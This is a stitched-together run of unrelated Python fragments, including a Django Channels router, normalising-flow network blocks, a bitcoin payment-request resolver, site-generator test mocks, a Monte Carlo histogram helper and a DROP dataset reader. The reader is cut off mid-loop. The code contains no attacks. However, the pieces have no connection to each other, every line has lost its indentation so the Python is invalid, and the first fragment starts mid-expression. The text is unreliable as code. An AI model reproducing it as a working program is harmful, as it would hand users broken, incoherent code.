[ 0., 0., 3., 0.],
[ 0., 0., 0., 4.]])
'''
@matmat
def forwardAdjoint(x):
return v[:, np.newaxis] * x
return LinearOperator( (len(v), len(v)),
forwardAdjoint, forwardAdjoint)
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import path
from jarvis import consumers
websocket_urlPattern=[
path('ws/jarvis/',consumers.botConsumer.as_asgi()),
]
application=ProtocolTypeRouter({
# 'http':
'websocket':AuthMiddlewareStack(URLRouter(websocket_urlPattern))
})
from enum import Enum
from torch import nn as nn
from daain.model.normalising_flow.coupling_blocks.attention_blocks import ApplyModuleOnSplit
from daain.model.normalising_flow.coupling_blocks.attention_blocks.fixed_distance_attention import (
FixedDistanceAttention,
)
from daain.model.normalising_flow.coupling_blocks.attention_blocks.self_attention import (
SelfAttentionLayerSAGAN,
)
class CouplingBlockType(Enum):
GLOW_1x1_CONV = "glow_1x1_conv"
GLOW_1x1_CONV_v2 = "glow_1x1_conv_v2"
GLOW_DEPTH_CONV = "glow_depth_conv"
GLOW_ATTENTION = "glow_attention"
GLOW_LINEAR = "glow_linear"
GLOW_POS_ATTENTION = "glow_positional_attention"
IRESNET = "iresnet"
RNVP_1x1_CONV = "rnvp_1x1_conv"
GIN_LINEAR = "gin_linear"
CONDITIONAL = "conditional"
GLOW_1x1_CONV_GIN = "glow_1x1_conv_gin"
def is_1d(self):
return self in [
CouplingBlockType.GLOW_LINEAR,
CouplingBlockType.GLOW_POS_ATTENTION,
CouplingBlockType.CONDITIONAL,
CouplingBlockType.GIN_LINEAR,
]
def use_permutation_layer(self):
        # The GLOW_POS_ATTENTION block adds the coordinates to the data as additional channels. The permutation is
        # thus done a bit differently for this type of model.
return self not in [CouplingBlockType.GLOW_POS_ATTENTION]
def use_cuda(self):
return not self == CouplingBlockType.GLOW_LINEAR
def min_factor_to_be_larger(a, b):
f = 1
while f * a < b:
f += 1
return f, f * a
def subnet_linear(c_in, c_out):
return nn.Sequential(nn.Linear(c_in, min(c_in, c_out // 2)), nn.ReLU(), nn.Linear(min(c_in, c_out // 2), c_out),)
def subnet_fc(c_in, c_out):
return nn.Sequential(nn.Linear(c_in, 10), nn.ReLU(), nn.Linear(10, c_out))
def subnet_conv_1x1(c_in, c_out):
# TODO adjust this according to the input size, should always be larger than the given input
return nn.Sequential(nn.Conv2d(c_in, 256, 1), nn.ReLU(), nn.Conv2d(256, c_out, 1))
# def subnet_conv_1x1_v2(c_in, c_out, num_channels):
# return nn.Sequential(nn.Conv2d(c_in, c_out, kernel_size=1), nn.ReLU())
def subnet_depth_conv(c_in, c_out, num_channels):
k, out_depth = min_factor_to_be_larger(c_in, c_out)
return nn.Sequential(
nn.Conv2d(c_in, out_depth, 3, groups=c_in, padding=1), nn.ReLU(), nn.Conv2d(out_depth, c_out, 3, padding=1)
)
def subnet_attention(c_in, c_out, n_attention_blocks=3):
return nn.Sequential(
*[SelfAttentionLayerSAGAN(c_in) for _ in range(n_attention_blocks)],
# nn.ReLU(),
nn.Conv2d(c_in, c_out, 1), # to bring it up to the required dimension
nn.BatchNorm2d(c_out)
)
def subnet_dist_attention(c_in, c_out, pairwise_distances):
return nn.Sequential(
FixedDistanceAttention(pairwise_distances=pairwise_distances),
ApplyModuleOnSplit(nn.Linear(c_in, c_out)),
ApplyModuleOnSplit(nn.ReLU()),
)
__author__ = 'mdavid'
from flask import request, Response
from redis import Redis
from addressimo.blockchain import cache_up_to_date
from addressimo.config import config
from addressimo.crypto import generate_bip32_address_from_extended_pubkey, generate_payment_request, get_unused_presigned_payment_request, derive_branch
from addressimo.signer.LocalSigner import LocalSigner
from addressimo.plugin import PluginManager
from addressimo.util import create_json_response, create_bip72_response
from addressimo.util import LogUtil, requires_valid_signature
log = LogUtil.setup_logging()
redis_conn = Redis.from_url(config.redis_addr_cache_uri)
# Constants
PR_MIMETYPE = 'application/bitcoin-paymentrequest'
def resolve(id):
###################################
# Verify Resolver and Request Data
###################################
if not cache_up_to_date():
log.critical('Address cache not up to date. Refresh Redis cache.')
return create_json_response(False, 'Address cache not up to date. Please try again later.', 500)
try:
id_obj = PluginManager.get_plugin('RESOLVER', config.resolver_type).get_id_obj(id)
except Exception as e:
log.error('Exception retrieving id_obj [ID: %s | Exception: %s]' % (id, str(e)))
return create_json_response(False, 'Exception occurred when retrieving id_obj from database', 500)
if not id_obj:
log.error('Unable to retrieve id_obj [ID: %s]' % id)
return create_json_response(False, 'Unable to retrieve id_obj from database', 404)
#################################################################################
# Determine Wallet Address to Return or Use in BIP70 PaymentRequest Generation
#################################################################################
if not id_obj.bip32_enabled and not id_obj.wallet_address:
log.error('bip32_enabled is False and static wallet_address is missing [ID: %s]' % id)
return create_json_response(False, 'Unable to retrieve wallet_address', 400)
if id_obj.bip32_enabled:
try:
waddr = get_unused_bip32_address(id_obj)
except Exception as e:
log.error('Exception occurred retrieving unused bip32 address [EXCEPTION: %s | ID: %s]' % (str(e), id))
return create_json_response(False, 'Unable to retrieve wallet_address', 500)
else:
waddr = id_obj.wallet_address
###########################
# Determine Response Type
###########################
bip70_arg = request.args.get('bip70','').lower()
# BIP70 Forced Request, but endpoint is not BIP70 capable
if bip70_arg == 'true' and not id_obj.bip70_enabled:
        log.error('Required bip70_enabled value is missing or disabled [ID: %s | bip70_enabled: %s]' % (id, id_obj.bip70_enabled))
return create_json_response(False, 'Required bip70_enabled value is missing or disabled', 400)
# BIP70-enabled Endpoint and BIP70 Request Forced or Accept-able by Client
    if id_obj.bip70_enabled and (bip70_arg == 'true' or PR_MIMETYPE in request.headers.get('accept', '')):
# Handle Pre-signed PaymentRequests
if id_obj.presigned_payment_requests:
valid_pr = get_unused_presigned_payment_request(id_obj)
if not valid_pr:
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
return Response(response=valid_pr, status=200, content_type=PR_MIMETYPE, headers={'Content-Transfer-Encoding': 'binary', 'Access-Control-Allow-Origin': '*'})
elif id_obj.presigned_only:
log.warn('Presigned PaymentRequests list empty [ID: %s]' % id)
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
# Handle Non-Presigned PaymentRequests
log.info('Creating bip70 payment request [ADDRESS: %s | AMOUNT: %s | ID: %s]' % (waddr, get_bip70_amount(id_obj), id))
try:
return create_payment_request_response(waddr, get_bip70_amount(id_obj), id_obj)
except Exception as e:
log.error('Exception occurred creating payment request [EXCEPTION: %s | ID: %s]' % (str(e), id_obj.id))
return create_json_response(False, 'Unable to create payment request', 500)
# BIP70-enabled Endpoint, but not BIP70-specific Request
if id_obj.bip70_enabled and bip70_arg != 'false':
# Handle Pre-signed Payment Requests
if not id_obj.presigned_payment_requests and id_obj.presigned_only:
log.warn('Presigned PaymentRequests list empty [ID: %s]' % id)
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
elif id_obj.presigned_payment_requests:
valid_pr = get_unused_presigned_payment_request(id_obj)
if not valid_pr:
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
return create_bip72_response(None, None, 'https://%s/resolve/%s?bip70=true' % (config.site_url, id))
# Handle Non-Presigned PaymentRequests
log.info('Returning BIP72 URI [Address: %s | ID: %s]' % (waddr, id))
return create_bip72_response(waddr, get_bip70_amount(id_obj), 'https://%s/resolve/%s?bip70=true&amount=%s' % (config.site_url, id_obj.id, get_bip70_amount(id_obj)))
# Return Standard BIP72 URI Response without a PaymentRequest URI
log.info('Returning Wallet Address [Address: %s | ID: %s]' % (waddr, id))
return create_bip72_response(waddr, 0)
def get_bip70_amount(id_obj):
if id_obj.bip70_static_amount is not None:
return id_obj.bip70_static_amount
elif request.args.get('amount'):
return int(request.args.get('amount'))
return 0
def get_unused_bip32_address(id_obj):
if not id_obj.master_public_key:
raise ValueError('Master public key missing. Unable to generate bip32 address.')
# Determine correct branch based on derive logic
branch = derive_branch()
# Get last generated index for the branch if it exists.
lg_index = PluginManager.get_plugin('RESOLVER', config.resolver_type).get_lg_index(id_obj.id, branch)
while True:
wallet_addr = generate_bip32_address_from_extended_pubkey(id_obj.master_public_key, branch, lg_index)
if not redis_conn.get(wallet_addr):
log.info('New Wallet Address created [Address: %s | Branch: %s | GenIndex: %s]' % (wallet_addr, branch, lg_index))
PluginManager.get_plugin('RESOLVER', config.resolver_type).set_lg_index(id_obj.id, branch, lg_index)
return wallet_addr
else:
log.debug('Used Wallet Address found! Trying next index [Branch: %s | GenIndex: %s]' % (branch, lg_index))
lg_index += 1
def create_payment_request_response(wallet_addr, amount, id_obj):
# TODO: This might not work with remote keys
if not id_obj.x509_cert:
raise ValueError('id_obj missing x509_cert')
signer = PluginManager.get_plugin('SIGNER', config.signer_type)
signer.set_id_obj(id_obj)
# Setup PaymentRequest
pr = generate_payment_request(
wallet_addr,
id_obj.x509_cert,
signer,
amount,
id_obj.expires,
id_obj.memo,
id_obj.payment_url,
id_obj.merchant_data
)
return Response(response=pr, status=200, content_type=PR_MIMETYPE, headers={'Content-Transfer-Encoding': 'binary', 'Access-Control-Allow-Origin': '*'})
@requires_valid_signature
def return_used_branches(id):
if not config.admin_public_key:
log.info('No key provided in config, Failing [ID: %s]' % id)
return create_json_response(False, 'ID Not Recognized', 404)
if request.headers.get('x-identity') == config.admin_public_key:
return create_json_response(data={'branches': PluginManager.get_plugin('RESOLVER', config.resolver_type).get_branches(id)})
return create_json_response(False, 'ID Not Recognized', 404)
def create_wallet_address_response(wallet_addr):
    return create_json_response(data={'wallet_address': wallet_addr})
import mock
from piecrust.app import PieCrust
from piecrust.appconfig import PieCrustConfiguration
def get_mock_app(config=None):
app = mock.MagicMock(spec=PieCrust)
app.config = PieCrustConfiguration(values={})
return app
def get_simple_content_item(app, slug):
src = app.getSource('pages')
assert src is not None
item = src.findContentFromRoute({'slug': slug})
assert item is not None
return item
def get_simple_page(app, slug):
src = app.getSource('pages')
item = get_simple_content_item(app, slug)
return app.getPage(src, item)
from .tmpfs import ( # NOQA
TempDirFileSystem as mock_fs,
TempDirScope as mock_fs_scope)
from numpy import *
import random
import numpy
##import pylab
from math import *
def dist(x,y):
return sqrt(numpy.dot(x-y,x-y))
class Histogram:
min=0.0
max=5.0
delta=0.05
numSamples=0
bins=numpy.array([0])
def add(self,val):
if self.min<val and val<self.max:
index=int((val-self.min)/self.delta)
self.bins[index]=self.bins[index]+1
self.numSamples=self.numSamples+1
    def printMe(self):
        for i in range(0, len(self.bins)):
            print(self.min + self.delta * i, self.bins[i] / (self.numSamples + 0.0))
# def plotMe(self,fileName=""):
# print "plotting"
# pylab.clf()
# self.bins=self.bins/self.numSamples
# xCoord=[self.min+self.delta*i for i in range(0,len(self.bins))]
# pylab.plot(xCoord,self.bins)
# pylab.gca().xaxis.major.formatter.set_scientific(False)
# if not(fileName==""):
# pylab.savefig(fileName)
# else:
# pylab.show()
# def plotMeNorm(self,fileName):
# print "plotting"
# pylab.clf()
# self.bins=self.bins/self.numSamples
# xCoord=numpy.array([self.min+self.delta*i for i in range(0,len(self.bins))])
# pylab.plot(xCoord,self.bins/(xCoord*xCoord+0.0001))
# pylab.gca().xaxis.major.formatter.set_scientific(False)
# pylab.savefig(fileName)
# pylab.show()
    def __init__(self, min, max, numBins):
        self.min = min
        self.max = max
        self.delta = (max - min) / (numBins + 0.0)
        self.bins = numpy.zeros(numBins) + 0.0
        self.numSamples = 0
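# A brief usage sketch (illustration only, not part of the original module):
# h = Histogram(0.0, 5.0, 50)
# for _ in range(1000):
#     h.add(random.random() * 5.0)
# h.printMe()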
def LaplacianPsiOverPsi(coords,WaveFunction):
total=0.0
delta=0.0001
tempVal3=WaveFunction(coords)
for i in range(0,len(coords)):
for j in range(0,len(coords[0])):
coords[i,j]=coords[i,j]+delta
tempVal=WaveFunction(coords)
coords[i,j]=coords[i,j]-2*delta
tempVal2=WaveFunction(coords)
coords[i,j]=coords[i,j]+delta
# print ((tempVal+tempVal2)-2.0*tempVal3)/(delta*delta)
total=total+((tempVal+tempVal2)-2.0*tempVal3)/(delta*delta)
return total/tempVal3
def ZeroFunction(R,c=1.0):
return 0.0
def GetRandomUniformVec(sigma,vec):
vec[0]=2.0*sigma*(random.random()-0.5)
vec[1]=2.0*sigma*(random.random()-0.5)
vec[2]=2.0*sigma*(random.random()-0.5)
#def GetRandomUniform(sigma,ndim):
# return numpy.array([(random.random()-0.5)*2*sigma for _ in range(0,ndim)])
def SetBondLength(bondLength):
ions=numpy.zeros((2,3))+0.0
ions[0]=[-0.5*bondLength, 0.0,0.0]
ions[1]=[0.5*bondLength,0.0,0.0]
return ions
import json
import copy
import string
import itertools
import numpy as np
from random import choice
from decimal import Decimal
from typing import Any, Dict, List, Tuple, Callable
import collections
from collections import defaultdict
from allennlp.common.file_utils import cached_path
from allennlp.tools.squad_eval import metric_max_over_ground_truths
from allennlp.data.tokenizers import Token, Tokenizer, WordTokenizer
from allennlp.data.dataset_readers.reading_comprehension.util import IGNORED_TOKENS, STRIPPED_CHARACTERS
import torch
import bert.tokenization as tokenization
from squad.squad_utils import _get_best_indexes, get_final_text, _compute_softmax
from squad.squad_evaluate import f1_score as calculate_f1
from drop.w2n import word_to_num
from drop.beam_search import beam_search
from drop.drop_eval import (get_metrics as drop_em_and_f1, answer_json_to_strings)
sign_remap = {0: 0, 1: 1, 2: -1}
class DropExample(object):
def __init__(self,
qas_id,
question_tokens,
passage_tokens,
numbers_in_passage=None,
number_indices=None,
answer_type=None,
number_of_answer=None,
passage_spans=None,
question_spans=None,
add_sub_expressions=None,
counts=None,
negations=None,
answer_annotations=None
):
self.qas_id = qas_id
self.question_tokens = question_tokens
self.passage_tokens = passage_tokens
self.numbers_in_passage = numbers_in_passage
self.number_indices = number_indices
self.answer_type = answer_type
self.number_of_answer = number_of_answer
self.passage_spans = passage_spans
self.question_spans = question_spans
self.add_sub_expressions = add_sub_expressions
self.counts = counts
self.negations = negations
self.answer_annotations = answer_annotations
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", \nquestion: %s" % (" ".join(self.question_tokens))
s += ", \npassage: %s" % (" ".join(self.passage_tokens))
if self.numbers_in_passage:
s += ", \nnumbers_in_passage: {}".format(self.numbers_in_passage)
if self.number_indices:
s += ", \nnumber_indices: {}".format(self.number_indices)
if self.answer_type:
s += ", \nanswer_type: {}".format(self.answer_type)
if self.number_of_answer:
s += ", \nnumber_of_answer: {}".format(self.number_of_answer)
if self.passage_spans:
s += ", \npassage_spans: {}".format(self.passage_spans)
if self.question_spans:
s += ", \nquestion_spans: {}".format(self.question_spans)
if self.add_sub_expressions:
s += ", \nadd_sub_expressions: {}".format(self.add_sub_expressions)
if self.counts:
s += ", \ncounts: {}".format(self.counts)
if self.negations:
s += ", \nnegations: {}".format(self.negations)
if self.answer_annotations:
s += ", \nanswer_annotations: {}".format(self.answer_annotations)
return s
class InputFeatures(object):
def __init__(self,
unique_id,
example_index,
tokens,
que_token_to_orig_map,
doc_token_to_orig_map,
input_ids,
input_mask,
segment_ids,
number_indices,
start_indices=None,
end_indices=None,
number_of_answers=None,
add_sub_expressions=None,
input_counts=None,
negations=None):
self.unique_id = unique_id
self.example_index = example_index
self.tokens = tokens
self.que_token_to_orig_map = que_token_to_orig_map
self.doc_token_to_orig_map = doc_token_to_orig_map
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.number_indices = number_indices
self.start_indices = start_indices
self.end_indices = end_indices
self.number_of_answers = number_of_answers
self.add_sub_expressions = add_sub_expressions
self.input_counts = input_counts
self.negations = negations
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "unique_id: %s" % (self.unique_id)
s += ", \nnumber_indices: {}".format(self.number_indices)
if self.start_indices:
s += ", \nstart_indices: {}".format(self.start_indices)
if self.end_indices:
s += ", \nend_indices: {}".format(self.end_indices)
if self.number_of_answers:
s += ", \nnumber_of_answers: {}".format(self.number_of_answers)
if self.add_sub_expressions:
s += ", \nadd_sub_expressions: {}".format(self.add_sub_expressions)
if self.input_counts:
s += ", \ninput_counts: {}".format(self.input_counts)
if self.negations:
s += ", \nnegations: {}".format(self.negations)
return s
WORD_NUMBER_MAP = {"zero": 0, "one": 1, "two": 2, "three": 3, "four": 4,
"five": 5, "six": 6, "seven": 7, "eight": 8,
"nine": 9, "ten": 10, "eleven": 11, "twelve": 12,
"thirteen": 13, "fourteen": 14, "fifteen": 15,
"sixteen": 16, "seventeen": 17, "eighteen": 18, "nineteen": 19}
def split_token_by_delimiter(token: Token, delimiter: str) -> List[Token]:
split_tokens = []
char_offset = token.idx
for sub_str in token.text.split(delimiter):
if sub_str:
split_tokens.append(Token(text=sub_str, idx=char_offset))
char_offset += len(sub_str)
split_tokens.append(Token(text=delimiter, idx=char_offset))
char_offset += len(delimiter)
if split_tokens:
split_tokens.pop(-1)
char_offset -= len(delimiter)
return split_tokens
else:
return [token]
def split_tokens_by_hyphen(tokens: List[Token]) -> List[Token]:
hyphens = ["-", "–", "~"]
new_tokens: List[Token] = []
for token in tokens:
if any(hyphen in token.text for hyphen in hyphens):
unsplit_tokens = [token]
split_tokens: List[Token] = []
for hyphen in hyphens:
for unsplit_token in unsplit_tokens:
if hyphen in token.text:
split_tokens += split_token_by_delimiter(unsplit_token, hyphen)
else:
split_tokens.append(unsplit_token)
unsplit_tokens, split_tokens = split_tokens, []
new_tokens += unsplit_tokens
else:
new_tokens.append(token)
return new_tokens
def extend_number_magnitude(number, next_token):
    if next_token == "hundred":
        number *= 100
    elif next_token == "thousand":
        number *= 1000
    elif next_token == "million":
        number *= 1000000
    elif next_token == "billion":
        number *= 1000000000
    elif next_token == "trillion":
        number *= 1000000000000
    return number
class DropReader(object):
def __init__(self,
debug: bool = False,
tokenizer: Tokenizer = None,
include_more_numbers: bool = False,
skip_when_all_empty: List[str] = None,
max_number_of_answer: int = 8,
max_number_count: int = 10,
logger = None) -> None:
super().__init__()
self.debug = debug
self._tokenizer = tokenizer or WordTokenizer()
self.include_more_numbers = include_more_numbers
self.max_number_of_answer = max_number_of_answer
self.max_number_count = max_number_count
self.skip_when_all_empty = skip_when_all_empty if skip_when_all_empty is not None else []
for item in self.skip_when_all_empty:
assert item in ["passage_span", "question_span", "addition_subtraction", "counting", "negation"], \
f"Unsupported skip type: {item}"
self.logger = logger
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
self.logger.info("Reading file at %s", file_path)
with open(file_path) as dataset_file:
dataset = json.load(dataset_file)
examples, skip_count = [], 0
for passage_id, passage_info in dataset.items():
passage_text = passage_info["passage"]
passage_tokens = self._tokenizer.tokenize(passage_text)
passage_tokens = split_tokens_by_hyphen(passage_tokens)
for question_answer in passage_info["qa_pairs"]:
question_id = question_answer["query_id"]
question_text = question_answer["question"].strip()
answer_annotations = []
if "answer" in question_answer:
answer_annotations.append(question_answer["answer"])
if "validated_answers" in question_answer:
answer_annotations += question_answer["validated_answers"]
example = self.text_to_example(question_text, passage_text, question_id,
answer_annotations, passage_tokens)
if example is not None:
examples.append(example)
else:
skip_count += 1
if self.debug and len(examples) > 100:
break
self.logger.info(f"Skipped {skip_count} examples, kept {len(examples)} examples.")
return examples
def text_to_example(self, # type: ignore
question_text: str,
passage_text: str,
question_id: str,
answer_annotations: List[Dict] = None,
passage_tokens: List[Token] = None):
if not passage_tokens:
passage_tokens = self._tokenizer.tokenize(passage_text)
passage_tokens = split_tokens_by_hyphen(passage_tokens)
question_tokens = self._tokenizer.tokenize(question_text)
question_tokens = split_tokens_by_hyphen(question_tokens)
answer_type: str = None
answer_texts: List[str] = []
number_of_answer: int = None
if answer_annotations:
# Currently we only use the first annotated answer here, but actually this doesn't affect
# the training, because we only have one annotation for the train set.
answer_type, answer_texts = self.extract_answer_info_from_annotation(answer_annotations[0])
number_of_answer = self.max_number_of_answer if len(answer_texts) > self.max_number_of_answer else len(answer_texts)
# Tokenize the answer text in order to find the matched span based on token
tokenized_answer_texts = []
for answer_text in answer_texts:
answer_tokens = self._tokenizer.tokenize(answer_text)
answer_tokens = split_tokens_by_hyphen(answer_tokens)
tokenized_answer_texts.append(answer_tokens)
numbers_in_passage = [0]
number_indices = [-1]
for token_index, token in enumerate(passage_tokens):
number = self.convert_word_to_number(token.text, self.include_more_numbers)
if number is not None:
numbers_in_passage.append(number)
number_indices.append(token_index)
valid_passage_spans = \
self.find_valid_spans(passage_tokens, tokenized_answer_texts) if tokenized_answer_texts else []
valid_question_spans = \
self.find_valid_spans(question_tokens, tokenized_answer_texts) if tokenized_answer_texts else []
number_of_answer = None if valid_passage_spans == [] and valid_question_spans == [] else number_of_answer
target_numbers = []
# `answer_texts` is a list of valid answers.
for answer_text in answer_texts:
number = self.convert_word_to_number(answer_text, self.include_more_numbers)
if number is not None:
target_numbers.append(number)
valid_signs_for_add_sub_expressions = self.find_valid_add_sub_expressions(numbers_in_passage,
target_numbers,
max_number_of_numbers_to_consider=3)
# Currently we only support count number 0 ~ 9
numbers_for_count = list(range(self.max_number_count))
valid_counts = self.find_valid_counts(numbers_for_count, target_numbers)
valid_negations = self.find_valid_negations(numbers_in_passage, target_numbers)
type_to_answer_map = {"passage_span": valid_passage_spans,
"question_span": valid_question_spans,
"addition_subtraction": valid_signs_for_add_sub_expressions,
"counting": valid_counts,
"negation": valid_negations}
if self.skip_when_all_empty \
and not any(type_to_answer_map[skip_type] for skip_type in self.skip_when_all_empty):
return None
return DropExample(
qas_id=question_id,
question_tokens=[token.text for token in question_tokens],
passage_tokens=[token.text for token in passage_tokens],
numbers_in_passage=numbers_in_passage,
number_indices=number_indices,
answer_type=answer_type,
number_of_answer=number_of_answer,
passage_spans=valid_passage_spans,
question_spans=valid_question_spans,
add_sub_expressions=valid_signs_for_add_sub_expressions,
counts=valid_counts,
negations=valid_negations,
answer_annotations=answer_annotations)
@staticmethod
def extract_answer_info_from_annotation(answer_annotation: Dict[str, Any]) -> Tuple[str, List[str]]:
answer_type = None
if answer_annotation["spans"]:
answer_type = "spans"
elif answer_annotation["number"]:
answer_type = "number"
elif any(answer_annotation["date"].values()):
answer_type = "date"
answer_content = answer_annotation[answer_type] if answer_type is not None else None
answer_texts: List[str] = []
if answer_type is None: # No answer
pass
elif answer_type == "spans":
# answer_content is a list of string in this case
answer_texts = answer_content
elif answer_type == "date":
# answer_content is a dict with "month", "day", "year" as the keys
date_tokens = [answer_content[key]
for key in ["month", "day", "year"] if key in answer_content and answer_content[key]]
answer_texts = date_tokens
elif answer_type == "number":
# answer_content is a string of number
answer_texts = [answer_content]
return answer_type, answer_texts
@staticmethod
def convert_word_to_number(word: str, try_to_include_more_numbers=False, normalized_tokens=None, token_index=None):
"""
Currently we only support limited types of conversion.
"""
if try_to_include_more_numbers:
            # strip all punctuation from the sides of the word, except for the negative sign
            punctuation = string.punctuation.replace('-', '')
            word = word.strip(punctuation)
            # some words may contain a comma as a delimiter
            word = word.replace(",", "")
# word2num will convert hundred, thousand ... to number, but we skip it.
if word in ["hundred", "thousand", "million", "billion", "trillion"]:
return None
try:
number = word_to_num(word)
except ValueError:
try:
number = int(word)
except ValueError:
try:
number = float(word)
except ValueError:
number = None
if number is not None and normalized_tokens is not None and token_index is not None:
if token_index < len(normalized_tokens) - 1:
next_token = normalized_tokens[token_index + 1]
if next_token in ["hundred", "thousand", "million", "billion", "trillion"]:
number = extend_number_magnitude(number, next_token)
return number
else:
no_comma_word = word.replace(",", "")
if no_comma_word in WORD_NUMBER_MAP:
number = WORD_NUMBER_MAP[no_comma_word]
else:
try:
number = int(no_comma_word)
except ValueError:
number = None
return number
@staticmethod
def find_valid_spans(passage_tokens: List[Token],
answer_texts: List[List[Token]]) -> List[Tuple[int, int]]:
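# Example (hypothetical tokens): for passage tokens ["The", "New", "York",
# "Giants", "won"] and answer text tokens ["new", "york", "giants"], the
# normalized matching below yields the single inclusive span (1, 3).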
normalized_tokens = [token.text.lower().strip(STRIPPED_CHARACTERS) for token in passage_tokens]
word_positions: Dict[str, List[int]] = defaultdict(list)
for i, token in enumerate(normalized_tokens):
word_positions[token].append(i)
spans = []
for answer_text in answer_texts:
answer_tokens = [token.text.lower().strip(STRIPPED_CHARACTERS) for token in answer_text]
num_answer_tokens = len(answer_tokens)
if answer_tokens[0] not in word_positions:
continue
for span_start in word_positions[answer_tokens[0]]:
span_end = span_start # span_end is _inclusive_
answer_index = 1
while answer_index < num_answer_tokens and span_end + 1 < len(normalized_tokens):
token = normalized_tokens[span_end + 1]
if answer_tokens[answer_index].strip(STRIPPED_CHARACTERS) == token:
answer_index += 1
span_end += 1
elif token in IGNORED_TOKENS:
span_end += 1
else:
break
if num_answer_tokens == answer_index:
spans.append((span_start, span_end))
return spans
@staticmethod
def find_valid_add_sub_expressions(numbers: List[int],
targets: List[int],
max_number_of_numbers_to_consider: int = 2) -> List[List[int]]:
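# Example (hypothetical numbers): with numbers = [50, 30, 12] and targets =
# [18], the pair (30, 12) with signs (+1, -1) evaluates to 18, giving the
# label vector [0, 1, 2] (0 = unused, 1 = plus, 2 = minus). Candidates that
# use index 0 are rejected below by the min(indices) != 0 check.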
valid_signs_for_add_sub_expressions = []
decimal_targets = [Decimal(x).quantize(Decimal('0.00')) for x in targets]
# TODO: Try smaller numbers?
for number_of_numbers_to_consider in range(2, max_number_of_numbers_to_consider + 1):
possible_signs = list(itertools.product((-1, 1), repeat=number_of_numbers_to_consider))
for number_combination in itertools.combinations(enumerate(numbers), number_of_numbers_to_consider):
indices = [it[0] for it in number_combination]
values = [it[1] for it in number_combination]
for signs in possible_signs:
eval_value = sum(sign * value for sign, value in zip(signs, values))
decimal_eval_value = Decimal(eval_value).quantize(Decimal('0.00'))
if decimal_eval_value in decimal_targets and min(indices) != 0:
labels_for_numbers = [0] * len(numbers)  # 0 represents "not included".
for index, sign in zip(indices, signs):
labels_for_numbers[index] = 1 if sign == 1 else 2 # 1 for positive, 2 for negative
if labels_for_numbers not in valid_signs_for_add_sub_expressions:
valid_signs_for_add_sub_expressions.append(labels_for_numbers)
return valid_signs_for_add_sub_expressions
@staticmethod
def find_valid_negations(numbers: List[int], targets: List[int]) -> List[List[int]]:
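# Example (hypothetical numbers): with numbers = [40, 25] and targets = [75],
# 100 - 25 = 75 matches a target, so the one-hot vector [0, 1] marks index 1
# as the number to negate (useful for percentage-complement questions).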
valid_negations = []
decimal_targets = [Decimal(x).quantize(Decimal('0.00')) for x in targets]
for index, number in enumerate(numbers):
decimal_negating_number = Decimal(100 - number).quantize(Decimal('0.00'))
if number > 0 and number < 100 and decimal_negating_number in decimal_targets:
labels_for_numbers = [0] * len(numbers)
labels_for_numbers[index] = 1
valid_negations.append(labels_for_numbers)
return valid_negations
@staticmethod
def find_valid_counts(count_numbers: List[int], targets: List[int]) -> List[int]:
valid_indices = []
for index, number in enumerate(count_numbers):
if number in targets:
valid_indices.append(index)
return valid_indices
def convert_answer_spans(spans, orig_to_tok_index, all_len, all_tokens):
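# Example (hypothetical tokenization): if word 3 starts at wordpiece 5 and
# word 4 starts at wordpiece 8, the word-level span (3, 3) maps to the
# inclusive wordpiece span (5, 7); spans that fall beyond the truncated
# token list are dropped by the bounds check below.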
tok_start_positions, tok_end_positions = [], []
for span in spans:
start_position, end_position = span[0], span[1]
tok_start_position = orig_to_tok_index[start_position]
if end_position + 1 >= len(orig_to_tok_index):
tok_end_position = all_len - 1
else:
tok_end_position = orig_to_tok_index[end_position + 1] - 1
if tok_start_position < len(all_tokens) and tok_end_position < len(all_tokens):
tok_start_positions.append(tok_start_position)
tok_end_positions.append(tok_end_position)
return tok_start_positions, tok_end_positions
def convert_examples_to_features(examples, tokenizer, max_seq_length, is_train, answering_abilities=None, logger=None):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
skip_count, truncate_count = 0, 0
features = []
for (example_index, example) in enumerate(examples):
que_tok_to_orig_index = []
que_orig_to_tok_index = []
all_que_tokens = []
for (i, token) in enumerate(example.question_tokens):
que_orig_to_tok_index.append(len(all_que_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
que_tok_to_orig_index.append(i)
all_que_tokens.append(sub_token)
doc_tok_to_orig_index = []
doc_orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.passage_tokens):
doc_orig_to_tok_index.append(len(all_doc_tokens))
if i in example.number_indices:
doc_tok_to_orig_index.append(i)
all_doc_tokens.append(token)
else:
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
doc_tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
# The -3 accounts for [CLS], [SEP] and [SEP]
# Truncate the passage according to the max sequence length
max_tokens_for_doc = max_seq_length - len(all_que_tokens) - 3
all_doc_len = len(all_doc_tokens)
if all_doc_len > max_tokens_for_doc:
all_doc_tokens = all_doc_tokens[:max_tokens_for_doc]
truncate_count += 1
query_tok_start_positions, query_tok_end_positions = \
convert_answer_spans(example.question_spans, que_orig_to_tok_index, len(all_que_tokens), all_que_tokens)
passage_tok_start_positions, passage_tok_end_positions = \
convert_answer_spans(example.passage_spans, doc_orig_to_tok_index, all_doc_len, all_doc_tokens)
tok_number_indices = []
for index in example.number_indices:
if index != -1:
tok_index = doc_orig_to_tok_index[index]
if tok_index < len(all_doc_tokens):
tok_number_indices.append(tok_index)
else:
tok_number_indices.append(-1)
tokens = []
que_token_to_orig_map = {}
doc_token_to_orig_map = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for i in range(len(all_que_tokens)):
que_token_to_orig_map[len(tokens)] = que_tok_to_orig_index[i]
tokens.append(all_que_tokens[i])
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(len(all_doc_tokens)):
doc_token_to_orig_map[len(tokens)] = doc_tok_to_orig_index[i]
tokens.append(all_doc_tokens[i])
